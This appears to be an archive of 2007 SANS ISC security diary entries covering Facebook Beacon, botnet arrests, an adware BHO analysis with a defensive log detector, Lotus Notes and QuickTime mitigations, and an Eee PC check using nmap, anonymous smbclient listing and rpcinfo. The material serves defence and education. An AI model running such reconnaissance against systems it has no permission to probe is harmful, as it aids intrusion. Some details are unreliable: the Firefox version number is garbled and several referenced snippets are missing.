No small amount of controversy has been raised about Facebook apparently tracking, and making public, the purchases users make online while logged into the Facebook site (even when they aren't making them through Facebook itself). Without repeating what has been said elsewhere about the controversy (or what I've said in another article I've written on the subject) or the specifics of tracking users in general, the interesting part of the controversy is that it was entirely preventable. When users add applications in Facebook, it asks them whether they want messages put in their profile and so forth, allows them to block feeds from being entered by other third-party sites, and offers additional privacy settings that would hide the feed regardless. Instead of being responsible, users mindlessly clicked through without thinking about the implications of what they were doing, put information out there that some didn't want out there, and now complain that nobody protected them from doing silly things. What you say and do online can and will be used against you (ok, maybe I'm just a tad cynical there), and when push comes to shove, the only person who can protect their personal data is the person themselves. And it's not just Facebook you have to worry about.
There are malicious porn sites out there, tracked by McAfee, that use pop-ups to extort money from perusers of free porn, and many also sell the personal information of their clientele. I recall an incident investigation I did some years ago that pointed back to a porn site in Mexico that happily charged people for their wares and then turned around and sold the credit card information legitimately given to them. And it's not just unsavory websites that quietly take user information and use it for commercial purposes; big companies do it too (e.g. Google).
The moral of the story is consumers need to be wary of how, when and to whom they give their personal information online. For the more privacy conscious, check out Firefox extensions TrackMeNot and AdBlock Plus to trim down on the information you put online.
UPDATE 2011 UTC: Facebook has made some modifications to the tracking service (Beacon) so that users have even more of an opportunity to restrict that information.
John Bambenek / bambenek (at) gmail [dot] com
University of Illinois
The FBI announced today that since Operation "Bot Roast" was made public last June, eight individuals have been indicted, pled guilty, or been sentenced for crimes related to botnet activity. Additionally, 13 search warrants were served in the U.S. and by overseas law enforcement partners in connection with this operation. This ongoing investigative effort has thus far uncovered more than $20 million in economic loss and more than one million victim computers. Round two of this effort, called "Bot Roast II" has resulted in:
- Three new indictments, including two this past month. In one case, the FBI uncovered a denial of service attack on a major university in the Philadelphia area and then knocked out much of the botnet by disrupting its ability to talk to other computers.
- Two previously charged criminals who pled guilty, including a California man who is a well known member of the botnet underground.
- The sentencing of three others, including a pair of men who launched a major phishing scheme targeting a Midwest bank that led to millions of dollars in losses.
Well done, FBI, and keep at it!
Marcus H. Sachs
Director, SANS Internet Storm Center
Recently I spent some time analyzing a relatively simple BHO (Browser Helper Object) just to see what the bad guys were really doing with it.
The BHO was dropped by an executable, which was part of a bigger adware package pretending to be an anti-virus program (of course). The only file dropped by this dropper was the DLL used by the BHO, which the dropper registered with the system.
After a quick analysis I found out that the BHO captured queries for various search engines and other commonly visited web sites and submitted them to a third web site. That web site could display various ads on the infected machine (when I tested the BHO, that component did not work).
The list of sites that the BHO stole information from was impressive – there were almost 140 sites monitored. For every site, the BHO had information about exactly what to extract, so only the user’s query was sent and not the whole URL.
For example, for wikipedia.org, the BHO extracted the search= parameter, while for search.yahoo.com it extracted the p= parameter.
The extracted parameters were then submitted to a third site (which is not working any more) with the following request:
The two most interesting things in this request are the svPOPUP and svKEYWORDS arguments. svPOPUP tells the ad site to display targeted ads related to the keywords submitted in the svKEYWORDS argument. As you can probably guess, those are the search terms the user entered.
This was all more or less standard, only the number of monitored web sites seemed pretty high – this BHO certainly had a serious impact on a user’s privacy.
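To show how a beacon like the one described above could be spotted at the proxy, here is an added example (my code, not from the diary or from the malware): it parses constructed proxy log lines, recognises the per-site search parameters mentioned above (search= for wikipedia.org, p= for search.yahoo.com), and flags requests carrying both svPOPUP and svKEYWORDS, noting whether the leaked keywords equal the client's previous search. The log format, client addresses and the ad host ads.example.invalid are assumptions; only the parameter names come from the diary.

```python
"""Detect search-term leakage by an Advatrix-style BHO in web proxy logs.

Added example: the log format, client addresses and the ad host are
constructed for illustration; only the parameter names come from the diary.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Search sites and the query parameter the BHO extracted from each (from the diary).
SEARCH_PARAMS = {
    "wikipedia.org": "search",
    "search.yahoo.com": "p",
}

# Arguments the BHO used when phoning home to the ad site (from the diary).
BEACON_ARGS = {"svPOPUP", "svKEYWORDS"}

# Constructed proxy log: "<timestamp> <client> <method> <url>" (assumed format).
SAMPLE_LOG = """\
2007-11-23T10:00:01 10.0.0.5 GET http://en.wikipedia.org/w/index.php?search=botnet+removal&go=Go
2007-11-23T10:00:02 10.0.0.5 GET http://ads.example.invalid/show.php?svPOPUP=1&svKEYWORDS=botnet+removal
2007-11-23T10:01:10 10.0.0.7 GET http://search.yahoo.com/search?p=eee+pc+samba
2007-11-23T10:01:11 10.0.0.7 GET http://ads.example.invalid/show.php?svPOPUP=1&svKEYWORDS=cheap+watches
2007-11-23T10:02:00 10.0.0.9 GET http://www.sans.org/
"""

LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)$")


def parse_line(line):
    """Split one log line into timestamp, client, lower-cased host and decoded query."""
    m = LOG_LINE.match(line.strip())
    if not m:
        return None
    url = urlsplit(m.group("url"))
    return {
        "ts": m.group("ts"),
        "client": m.group("client"),
        "host": (url.hostname or "").lower(),
        "query": parse_qs(url.query),
    }


def search_term(host, query):
    """Return the user's search term if this is a monitored search site, else None."""
    for domain, param in SEARCH_PARAMS.items():
        if host == domain or host.endswith("." + domain):
            values = query.get(param)
            if values:
                return values[0]
    return None


def is_beacon(query):
    """True when the request carries the BHO's phone-home arguments."""
    return BEACON_ARGS <= set(query)


def find_beacons(lines):
    """Return one record per beacon, correlated with the same client's last search."""
    last_search = {}  # client address -> most recent search term seen
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        term = search_term(rec["host"], rec["query"])
        if term is not None:
            last_search[rec["client"]] = term
            continue
        if is_beacon(rec["query"]):
            keywords = rec["query"]["svKEYWORDS"][0]
            hits.append({
                "ts": rec["ts"],
                "client": rec["client"],
                "ad_host": rec["host"],
                "keywords": keywords,
                # Strong indicator: the phoned-home keywords equal the search just made.
                "matches_prior_search": last_search.get(rec["client"]) == keywords,
            })
    return hits


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG.splitlines()):
        print(hit)
```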
After I searched the web a bit, I found out that Elia Florio from Symantec already described another variant of this same BHO which they called Trojan.Advatrix (Symantec's description is here). Besides the information I already had, that particular variant did something else to the machine. Something very, very mean.
Elia found out that the BHO modifies Internet Explorer so that it becomes vulnerable to two security vulnerabilities: MS06-014, known as the MDAC vulnerability, and MS07-017, known as the ANI vulnerability.
These two vulnerabilities are probably the most exploited vulnerabilities in Internet Explorer today. The MS06-014 vulnerability is practically a part of every exploit pack today (and is certainly in MPACK, which is the most popular one). Exploits for the ANI vulnerability can also still be found almost everywhere.
What makes me extremely worried is how hidden this whole thing is. The BHO just modifies Internet Explorer's in-memory image, which means that no files are written to the disk. In other words, such a machine will look completely patched to Windows Update or any other patch checking system. However, while the BHO is active, the machine will be vulnerable to the two most exploited client side vulnerabilities of the last couple of years.
The last line of defense, the anti-virus program, is not particularly helpful here either. The dropper I had was detected by only 13 out of 32 AV programs on VirusTotal and the DLL detection was even worse with only 7 AV programs detecting it.
While there are many lessons to learn from this malware, I would like to stress one really important thing: when a machine gets infected, your only option is to reinstall it from scratch. With today's malware phoning home and installing stealthy, updated modules, this is really a no brainer.
Computerworld is reporting a "large scale, coordinated campaign to steer users toward malware-spewing Websites from Google search results is under way."
- They quote approximately 40,000 pages that may be hosting malware.
- 27 different domains are involved.
- Each has up to 1499 malicious pages.
- Tactics used, per Sunbelt:
  - "comment spam": bots hide links in comment sections
  - "blog spam": bogus blog posts
  - plugging links into any web form that requests a link
Please let us know if you are seeing this activity via our contact page.
Thanks, Mari Nichols
As you can imagine, here at the ISC we get thousands (tens of thousands?) of user submitted questions and suggestions. Let me tell you what, we appreciate it. It's what binds the galaxy together. (TM)
But we had a user submitted question today that I found particularly interesting. Jim wrote in asking us:
"I am looking for some good policies and practices to help my help desk avoid falling victim to social engineering. I looked around on SANS and other sites but find little more than asking a few questions to verify identity. We are also considering a callback as an auditing step. What do you think?"
So what DO you think readers?
Core Security has put out a new advisory concerning a buffer overflow in Lotus Notes. It is both remotely and locally exploitable.
Core lists the vulnerable software pieces as:
- Lotus Notes version 7.x
- Lotus Notes version 8.x (not confirmed by Core)
- Lotus Notes version 6.5.6 (not confirmed by Core)
- Other software packages using the Verity KeyView SDK with vulnerable versions of l123sr.dll
It's prudent to keep in mind that, as of now, 8.x and 6.5.6 are NOT confirmed by Core (see their advisory and the cut and paste above).
Cut and Paste from Core's Advisory:
Lotus Notes customers should follow the instructions of the following support Technote, which outlines the available options based on specific versions of Lotus Notes:

Workaround 1: Delete the keyview.ini file in the Notes program directory. This disables ALL viewers. When a user clicks View (for any file), a dialog box will display with the message "Unable to locate the viewer

Workaround 2: Delete the problem file l123sr.dll. When a user tries to view the specific file type, a dialog box will display with the message "The viewer display window could not be initialized." All other file types work without returning the error message.

Workaround 3: Comment out specific lines in keyview.ini for any references to the problem file (l123sr.dll). To comment a line, you precede it with a semi-colon (;). When a user tries to view the specific file type, a dialog box will display with the message "The viewer display window could not be initialized". For example:

Workaround 4: Filter inbound emails with attachments with potentially malicious files. Lotus 1-2-3 files are usually associated to MIME Content-Type headers set to the following strings:

Note however that workaround #4 is simply a stop gap measure that could be circumvented by relatively unsophisticated attackers.
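For Workaround 3 above, here is an added example (mine, not Core's or IBM's) that comments out every active keyview.ini line referencing l123sr.dll, is safe to run twice, and reports whether any reference remains, which is what you would want when pushing the change to many Notes clients. The INI fragment and its key names are constructed; only the file name and DLL name come from the advisory.

```python
"""Apply and verify Workaround 3 (comment out l123sr.dll in keyview.ini).

Added example. The INI content below is constructed for illustration; the
section and key names are assumptions, not Core's or IBM's example. Only
keyview.ini and l123sr.dll come from the advisory.
"""

PROBLEM_DLL = "l123sr.dll"

# Constructed keyview.ini fragment: two entries reference the problem DLL,
# in different letter cases, and one line is already a comment.
SAMPLE_INI = """\
[Formats]
; viewer mappings (constructed example, hypothetical keys)
123=l123sr.dll
WK4=L123SR.DLL
DOC=example_doc.dll
XLS=example_xls.dll
"""


def references_dll(line, dll=PROBLEM_DLL):
    """True if an active (uncommented, non-blank) line mentions the DLL, any case."""
    stripped = line.strip()
    return bool(stripped) and not stripped.startswith(";") and dll.lower() in stripped.lower()


def apply_workaround3(text, dll=PROBLEM_DLL):
    """Prefix ';' to every active line referencing the DLL.

    Returns (new_text, number_of_lines_changed). Already-commented lines are
    left alone, so running it again changes nothing; all other lines are kept
    byte-for-byte.
    """
    out, changed = [], 0
    for line in text.splitlines(keepends=True):
        if references_dll(line, dll):
            out.append(";" + line)
            changed += 1
        else:
            out.append(line)
    return "".join(out), changed


def remaining_references(text, dll=PROBLEM_DLL):
    """Active lines still referencing the DLL; empty means the workaround is in place."""
    return [l.rstrip("\r\n") for l in text.splitlines(keepends=True) if references_dll(l, dll)]


if __name__ == "__main__":
    fixed, n = apply_workaround3(SAMPLE_INI)
    print(f"{n} line(s) commented out; remaining: {remaining_references(fixed)}")
    print(fixed)
```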
There's a new update for Firefox out. 126.96.36.199.
There has been considerable growth in online collaboration tools. Wikis are an excellent example of these, and the growth of their use has been dramatic.
However, this success can lead to logistical issues when security advisories are released. Today a reader contacted us with a plea to help alert users of TikiWiki that exploits for it are being actively used.
The TikiWiki team has been working hard on fixing a number of reported vulnerabilities in their Wiki. However, site administrators have been slow to update their systems.
Mose from the TikiWiki project has been very helpful in highlighting that they are working on a new administration pane within their application which will alert administrators when new releases are available. Until then, if you are using TikiWiki, please update to the latest release. For details go to http://info.tikiwiki.org/tiki-index.php
Thank you all for writing in!! We appreciate it, things have been a little crazy around the ISC today, so we haven't been able to throw some stuff up on the diary about the Quicktime bug. (We've had to wake everyone up, they all ate turkey..tryptophan... it's not pretty, anyway...)
As outlined by Secunia, Apple's Quicktime 7.2 and 7.3 have an overwrite condition via incorrect RTSP parsing. Check it out here.
There are several things you can do until this gets patched (just remember to undo them after you patch!).
1) Block the RTSP protocol. Ports are 554/tcp and 6970-6999/udp.
2) Set the Killbit for the Quicktime CLSIDs:
There are some other recommendations over at the US-CERT site. But like I said, remember to undo them after the patch, or you will be wondering why things aren't working with your Quicktime streams.
Please remember that Quicktime is a component of iTunes...
Last week I got my xmas gift...:) An Eee PC (see Wikipedia on it).
Basically, it is a small laptop (7" screen) running a Linux version called Xandros (Debian based), with a quite user-friendly interface, mostly for internet applications.
Well, it is quite good, and I am really liking it, but, of course, I had to try its security :).
Fortunately it allows you to get a console, from which you can instantly get root access by issuing 'sudo bash'.
Well, this is not good, since anyone who can get to it can change the root password, possibly leaving you with restoring the system as your only alternative. So changing the config to ask for a password is a 'must do', imho...:)
But let’s go to interesting stuff.
I was curious to see which ports were open using nmap from a remote host on it.
That was the result:
The SYN Stealth Scan took 0.61s to scan 1239 total ports.
Host 192.168.0.207 appears to be up ... good.
Interesting ports on 192.168.0.207:
Not shown: 1236 closed ports
PORT STATE SERVICE
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap finished: 1 IP address (1 host up) scanned in 1.525 seconds
Hum...ports 111, 139 and 445...139 and 445 are usually associated with Windows systems, but we are on Linux.
Also port 111, this is portmap...
So let's dig a little more. Using smbclient to query our remote system:
lab3:~# smbclient -N -L '\\192.168.0.207' (-L to list and -N for no password)
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.24]
Sharename Type Comment
--------- ---- -------
IPC$ IPC IPC Service (eeepc-root server (Asus Eee PC))
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.24]
EEEPC-ROOT eeepc-root server (Asus Eee PC)
In my opinion this is too much information to be shared...
Here we have the information that the Eee PC is running Samba (that explains ports 139 and 445), the Samba version (3.0.24) and some workgroup and share info...
On port 111, nmap says portmap, so let's check it with rpcinfo:
lab3:~# rpcinfo -p 192.168.0.207
program vers proto port
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
On our local system, we can check those with netstat -anp:
lab3:~# netstat -anp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN 2339/smbd
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 1409/portmap
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 1398/cupsd
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN 2339/smbd
udp 0 0 192.168.0.207:137 0.0.0.0:* 2337/nmbd
udp 0 0 0.0.0.0:137 0.0.0.0:* 2337/nmbd
udp 0 0 192.168.0.207:138 0.0.0.0:* 2337/nmbd
udp 0 0 0.0.0.0:138 0.0.0.0:* 2337/nmbd
udp 0 0 0.0.0.0:68 0.0.0.0:* 2157/dhclient3
udp 0 0 0.0.0.0:68 0.0.0.0:* 1613/dhclient3
udp 0 0 0.0.0.0:111 0.0.0.0:* 1409/portmap
udp 0 0 0.0.0.0:631 0.0.0.0:* 1398/cupsd
Again, Samba (smbd and nmbd) and portmap (sunrpc). Also, we can see CUPS (used for printing).
Now, we could try to create some iptables rules to restrict access, but the iptables modules are not loaded...:(
Another alternative is to shut it down.
Since it is a Debian-based Linux, this could be easily done with:
but it will only stop them for the current session. If you reboot it, they will be back...
Another option is to edit /etc/hosts.deny and add the line
to restrict access to this service.
Or even disable it, by commenting out the daemons in the usr/sbin/services.sh file.
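Before deciding what to stop or firewall, it helps to know exactly which sockets are reachable from the network. The added example below (mine, not from the diary) parses the netstat -anp listing above, which is embedded as its input, and reports per program the ports bound to a wildcard or LAN address, separating them from loopback-only sockets; note that cupsd turns out to be local-only on tcp/631 but exposed on udp/631. In practice you would feed it the live output of netstat -anp.

```python
"""Report network-reachable listeners from `netstat -anp` output (added example)."""
import re
from collections import defaultdict

# The diary's own netstat listing, embedded so the script runs offline.
NETSTAT_OUTPUT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN 2339/smbd
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 1409/portmap
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 1398/cupsd
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN 2339/smbd
udp 0 0 192.168.0.207:137 0.0.0.0:* 2337/nmbd
udp 0 0 0.0.0.0:137 0.0.0.0:* 2337/nmbd
udp 0 0 192.168.0.207:138 0.0.0.0:* 2337/nmbd
udp 0 0 0.0.0.0:138 0.0.0.0:* 2337/nmbd
udp 0 0 0.0.0.0:68 0.0.0.0:* 2157/dhclient3
udp 0 0 0.0.0.0:68 0.0.0.0:* 1613/dhclient3
udp 0 0 0.0.0.0:111 0.0.0.0:* 1409/portmap
udp 0 0 0.0.0.0:631 0.0.0.0:* 1398/cupsd
"""

# Matches listening TCP sockets and all UDP sockets; established TCP
# connections (state other than LISTEN) deliberately do not match.
# "-" appears instead of PID/Program when netstat is run without privileges.
SOCKET_LINE = re.compile(
    r"^(?P<proto>tcp6?|udp6?)\s+\d+\s+\d+\s+"
    r"(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+"
    r"(?:LISTEN\s+)?(?:(?P<pid>\d+)/(?P<prog>\S+)|-)$"
)


def parse_netstat(text):
    """Return one dict (proto, addr, port, pid, prog) per listening socket."""
    sockets = []
    for line in text.splitlines():
        m = SOCKET_LINE.match(line.strip())
        if m:
            sock = m.groupdict()
            sock["prog"] = sock["prog"] or "unknown"
            sockets.append(sock)
    return sockets


def is_local_only(addr):
    """True for sockets only reachable from the machine itself."""
    return addr.startswith("127.") or addr == "::1"


def exposed_by_program(sockets):
    """Map program name -> sorted 'port/proto' list for sockets the LAN can reach.

    Wildcard (0.0.0.0, ::) and interface addresses both count as exposed.
    """
    exposed = defaultdict(set)
    for s in sockets:
        if not is_local_only(s["addr"]):
            exposed[s["prog"]].add(f"{s['port']}/{s['proto']}")
    return {prog: sorted(ports) for prog, ports in exposed.items()}


def local_only_sockets(sockets):
    """'port/proto' entries bound to loopback only, for contrast with the exposed set."""
    return sorted(f"{s['port']}/{s['proto']}" for s in sockets if is_local_only(s["addr"]))


if __name__ == "__main__":
    socks = parse_netstat(NETSTAT_OUTPUT)
    for prog, ports in sorted(exposed_by_program(socks).items()):
        print(f"{prog:<12} reachable from the network on {', '.join(ports)}")
    print("loopback only:", ", ".join(local_only_sockets(socks)))
```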
Again, I am not saying that leaving these services open means you will be hacked, especially since I am not aware of any recent vulnerability in them, but we are at least giving away too much information...
This is just one example of how our new gadgets can expose us. New smartphones, whether Linux or Windows based, can also expose you and your data, and as we use them to store lots of our data, we must be paranoid about their security measures...at least I am...:)
Ah, about my eeepc...it is not McDonalds, but "I am loving it!" :) All my security tools were installed perfectly on it...;)
Handler on Duty: Pedro Bueno ( pbueno //&&// isc. sans. org)
As I was reading Deb's article yesterday about our need for policies, my first thought was yes, of course we need policies! We are able to write all the policies we want, but how do we get them approved? Do we break the policies down into smaller sections for faster approval? Or do we publish one "Acceptable Use Policy" and hope that covers us with our employees? Do we ask for volunteers for a policy committee? Do we forget about setting standards and just get general network usage policies approved?
Policies, procedures and standards are necessary for multiple reasons. One of the key reasons is to set the record straight for the users of our systems and our system administrators setting up the systems. We need to set the limits on what they can and cannot do. Do you even know where you stand? Do you know what is "acceptable risk" for your organization? Would you have the budget to put behind the policy if it were approved?
Remember to utilize your legal department and internal audit department (if you have them) as assistance in getting justification. We all know that being able to provide proper documentation plays a key role during litigation, outside attack or insider related. These people will help you get the ball rolling in the right direction, if you need help.
If and when you get your policy approved, how often should you revisit and revise? Did you set these time tables into the policy or just thank the digital stars that you finally got sign off? We would like to hear your policy battle stories. Please send any lessons learned from your policy process to us here. I'm looking forward to learning some new techniques.
Corporate IT departments spend millions of dollars to secure the perimeters of their networks. Firewalls, gateway filtering, intrusion detection systems and monitoring services are some of the methods used to keep hackers and malicious code exploits out. Yet their data may still be getting compromised without them knowing it. In today's age of mobile technology the data may be leaking out unintentionally.
In the past the policy was pretty simple: everyone uses VPN and two factor authentication. Today many corporations use intranets and internal web pages to store and access data. This makes it handy for the worker who travels and works on the road. However, if the employee isn't thinking about the security of the company data, or hasn't been trained in the methods needed to secure the data, the company can experience a data leak. For instance, if the employee checks their email or accesses these internal websites from a public terminal in an airport, Internet cafe, hotel, etc., what data is left behind? Who could be "shoulder surfing" and watching them work? What about programs planted on these machines that can track all of the information entered (including userid and password information)? If you look at programs like WebWatcher and Spector Pro, you see how easy it may be to capture everything from a public terminal. Because of programs such as these, should corporations have policies against use of public terminals to access company information?
What about the information posted in public tech support sites or blog sites? Is too much information being revealed online in insecure locations? Many self help tech support sites are available on the Internet. There is a wealth of information available and a huge community of "experts" available online. This can be a great thing. However, is proprietary or critical company information being posted in these sites? It is interesting to see the amount of information about their company, systems and network people are willing to share in these exchanges without even realizing that they have just given the bad guy the "key to the door".
Do corporations/companies, (large and small) have policies and procedures in place to minimize the amount of information leakage their company experiences? How do we educate and train our employees to think about what they are doing and how it will impact the company?
SANS Institute has a significant number of resources and templates available for you to start the process of identifying and developing Policies and Procedures. www.sans.org/resources/policies/ This is a good starting place and has some really good templates for a number of security related concerns.
We would like to know if you have a particular policy or procedure that you would like to share with us or if you have good online resources you can recommend.
One of our readers, David Bizeul, spent the past three months researching the Russian Business Network (RBN). The RBN is a virtual safe house for Russian criminals responsible for malicious code attacks, phishing attacks, child pornography and other illicit operations (we previously provided an analysis of the RBN that was produced by iDefense.) The 70-page paper is on David's web site, and David said that he may update it in the future. We are mirroring the paper for him just in case his site gets overloaded. David's contact information is in the paper so if you like what you see please let him know.
Marcus H. Sachs
Director, SANS Internet Storm Center
Happy Thanksgiving to all of our USA readers! For most countries, this weekend coming up is the start of the holiday season. For many retailers, tomorrow (Friday November 23rd) is "Black Friday" and recently there's been the introduction of "Cyber Monday" (Monday November 26th) when everybody comes back to work and uses their office computers to go shopping online. However and wherever you shop, and whatever your customs and traditions are, as we enter another holiday season it's time once again to think about computer security for our family and friends.
This is a golden opportunity for information security professionals around the world to spread the word about security and to "give some security" when you exchange presents later this year. Let us know what you plan to give as a security gift to your friends and families. Do you know of any cool ideas that other readers might like? Did somebody give you something last year that really helped you with security? I doubt that grandma would appreciate a copy of Hacking for Grannies Exposed but I'm sure that there is something on the shelf that would be good for her in a security sense. Please use our contact form to let us know your plans to "give some security" this year. We'll post the best ideas here later in the day.
Art wrote us with a good idea: instead of buying security stuff, he is making CDs for friends and family. He'll put free stuff on them, free AVG, Spybot Search and Destroy, and links to other downloads such as Windows Defender in a .txt file. He said it's not a gift for them, it's for him. Less headaches, he said. He also suggested a gift his wife might consider, a Cisco PIX. Nice touch, Art! I hope that Santa is nice to you.
Marcus H. Sachs
Director, SANS Internet Storm Center
A reader wrote in to tell us about a spam he received that read like this:
"I'm a computer engineer at Islamic University of Gaza(IUG), the network of my university hacked in the last few months , now I design a secure model to repair the network security system in IUG but my experience still little, so I hope that I can obtain a diagram or flowchart or map of your university network security system to study it and see how can apply it in IUG system."
I guess that's a good way of getting information about your network innards instead of hacking it "hey, can you just send me your visio diagram!? That'd be great, kthnkx!"
Gotta watch out for that Social Engineering. It's the basis of all those bank, Visa, MasterCard, etc. spams, phishes, and whatever other things are out there nowadays. Counting on an "uneducated" user to click and fill out some information.
Been thinking lately about some of the restrictive policies that corporations, .mil, .gov, and some others have when it comes to security.
Does it work?
Where are we at?
Are all the extremely restrictive policies in your corporate work environment working?
What can be relaxed? Why?
Example: I recently ran across a case where iTunes was not allowed on the network because it was considered P2P. Is iTunes P2P? Of course not, but here is an example where re-education of the "experts" and the loss of "policy for policy's sake" may be helpful.
We'd like to hear your feedback. What does Security 2.0 mean to you? We all have our own opinions, we'd like to hear yours!
“There is nothing on my computer that a hacker would be interested in.”
How often do you hear that statement as a key point in someone’s defense strategy? It is something I’ve often heard in social outings and family gatherings.
I try to use it as an opportunity for security awareness. First, rephrase the statement as: "There is nothing on my computer that a criminal would be interested in." This takes the conversation away from the contentious "what does the word hacker mean" debate. If you focus on protecting yourself from criminals, you stand a pretty good chance against hackers/crackers as well (whether or not you feel there is such a distinction).
What makes up an abstract computer system on the Internet?
- CPU
- Memory
- Hard Drive
- Internet access/IP address
- User data
So what would a criminal be interested in on this average computer?
CPU: botnets often use their slave machines to send email, proxy web traffic, and launch denial of service attacks. These all use slices of CPU on the machine to do work that they would otherwise not have the resources to do.
Memory: the user's browsing habits, username/password credentials, and other sensitive user data are captured out of memory.
Hard Drive: I have seen bot-nets that perform no other service than act as a giant library to store pirated films and audio.
Internet access/IP address: every new IP that isn't already on a blocklist is of interest to spammers. Criminals can host malicious websites on a machine to avoid other blocklists. Criminals can proxy their traffic through a machine to hide their true location and to get around companies' firewalls blocking known-bad IPs.
What about User Data?
Everyone knows that criminals are interested in your banking and PayPal credentials. They are also after your eBay passwords so they can sell stolen goods in your name. They are after your Facebook and MySpace credentials so they can post links to malicious websites (look at Dancho Danchev's post today for an example). They're after your email address. Even by itself a working email address is worth money. Take a person's address book and you get their social network, which can be used to launch targeted email attacks. Your email address is often used as your account name on a number of web services. It's arguable that these days you can correlate more about a person from their email address than from their Social Security Number.
So you may think there is nothing of interest on your machine, but there are certainly things of value on your system. Criminals know how to “make it up in volume.”
Holiday/Family Incident Response: Why and How
Apologies in advance that this is Windows-centric.
Many of us are going to be visiting with friends and family over the next couple of months while celebrating a number of year-end holidays. Often, we are tapped for on-site tech-support duty in exchange for holiday treats.
Yesterday George posted a request for what's in your holiday/family incident response toolkit. Overnight I collected the responses in the hope of presenting a useful and organized list.
Incident response under these conditions can be much harder than what one encounters at the day job. The builds are non-standard, there are rarely backups to rely on, and the data are irreplaceable (personal financial data, photographs, genealogical projects, etc.). The stakes are often higher.
The response methodology is similar to what you'd run into at work:
- Lessons Learned/Prevention
Hopefully that was done last year when you put on AV, firewalls, and anti-spyware. This year, root-kit detection tools are more widely available, so it's a good time to update your jump-kit and your framework.
The first step is an interview with the machine user. You should ask things like:
- "Have you patched recently?"
- "Is the machine running slowly?"
- "Getting a lot of pop-ups?"
Follow the interview with an inspection to verify that the AV is present, running, and up-to-date. Ensure that the OS is fully patched. Peek at the hosts file. See if there is reason to suspect that the machine is compromised before you start tearing into it.
Should you determine that the machine has been compromised, it is time to start backing up the important files off of the machine. The only sure approach to cleaning a system is to rebuild it. There were many spyware/virus cleaning tools submitted, but I consider them useful only in the Identification phase to determine if the machine has been compromised. I personally do not recommend them for reliable system cleanup.
If the system was properly secured last time, and no ill has come of it, then congratulations. But your work is not over. This final stage is the most important stage in incident response. Go over what you found in your investigation, point it out, and provide a solution. No anti-virus? Put one on. No backups? Make one. Firewall not enabled? Enable it. This is the point where you provide additional instructions, set up an ongoing tech-support option (if you're brave/generous enough), and suggest alternatives (say, move them from IE7 to Opera or Firefox, which have their own issues, so you have to carefully consider the consequences of that).
I broke the tools down into the following categories:
- Frameworks - how one deploys the tools to the system
- System Analysis
- Malware Analysis - a subset of System Analysis tools focused to analyzing the malware
- Network Analysis
- Registry Cleanup
- Remote Support
- Browser protection
CD vs. USB
How should you transport your tools to the site? There are a lot of good arguments supporting the use of burned CDs and of USB drives.
CD/DVD:
- You can leave copies behind for them to use
- It's hard to infect them
- Capacity - a trade-off can be made between capacity and expense by switching to DVD
USB:
- Flexibility - you can write to them
- Make nice gifts
- Risky, if you don't write protect them
- Costlier than CD/DVD media
Of course one can simply run from the CD or USB on the live system. In some cases this is the best first step, especially if you suspect something like a botnet running on the system. Live incident response can quickly identify that the machine is compromised and show you the code that's causing the traffic right away (see below for the System Analysis tools one can use in these cases).
Others prefer to work from a boot-disk when analyzing a system, particularly when a root-kit is suspected. These came in two varieties, Windows-based and Linux-based.
For Windows-based options, people recommended:
- BartPE (http://www.nu2.nu/pebuilder/)
- Ultimate Boot CD (http://www.ubcd4win.com)
- PortableApps (http://portableapps.com/)
For Linux-based options try:
- BackTrack 2 (http://www.remote-exploit.org/backtrack.html)
- Knoppix (http://www.knoppix.org/) take a look for the Knoppix variant knoppicillin
- Helix (http://www.e-fense.com/helix/)
- Ubuntu 7.10 which supports Read/Write access to NTFS partitions
These tools can be used for an initial assessment of the system. One (or more) of these should be left installed on the system when you leave. There are plenty of great commercial solutions. I'm only listing free solutions today:
- Grisoft's AVG (http://www.grisoft.com)
- ClamWin (http://www.clamwin.com/)
- Avast! (http://www.avast.com/eng/avast_4_home.html)
- Avira Antivir (http://www.free-av.com/)
- Microworld Free AV toolkit (http://www.mwti.net/products/mwav/mwav.asp)
Like anti-virus tools, these play a role in initial assessment of the system, and should be installed on the system when you leave it for added protection.
- Spybot Search and Destroy (http://www.safer-networking.org/en/spybotsd/index.html) the most commonly suggested tool
- Adaware (http://www.download.com/Ad-Aware-2007-Free/3000-8022_4-10045910.html?part=dl-ad-aware&subj=dl&tag=top5)
- Sunbelt's CounterSpy Trial Edition (http://www.sunbelt-software.com/Home-Home-Office/CounterSpy/)
- cwshredder (http://www.intermute.com/spysubtract/cwshredder_download.html) a very focused spyware cleaner
- Spywareblaster (http://www.javacoolsoftware.com/spywareblaster.html)
- Winpatrol (http://www.winpatrol.com/)
- BOClean (http://www.comodo.com/boclean/boclean.html) which I find to be an interesting little tool
- PC Tools Spyware Doctor (http://www.pctools.com/spyware-doctor/)
- Runscanner (http://www.runscanner.net)
We did not have a lot of anti-rootkit tools last year. They may turn up things that aren't showing up in your other scans.
- Sysinternals RootkitRevealer (http://www.microsoft.com/technet/sysinternals/Utilities/RootkitRevealer.mspx)
- F-Secure Blacklight (http://www.f-secure.com/blacklight/)
- GMER (http://www.gmer.net)
- AVG Anti-rootkit (http://www.grisoft.com/doc/download-free-anti-rootkit)
- IceSword (http://www.antirootkit.com/software/IceSword.htm)
- Rootkit Unhooker (http://antirootkit.com/software/RootKit-Unhooker.htm)
- Sophos Anti-rootkit (http://www.sophos.com/products/free-tools/sophos-anti-rootkit.html)
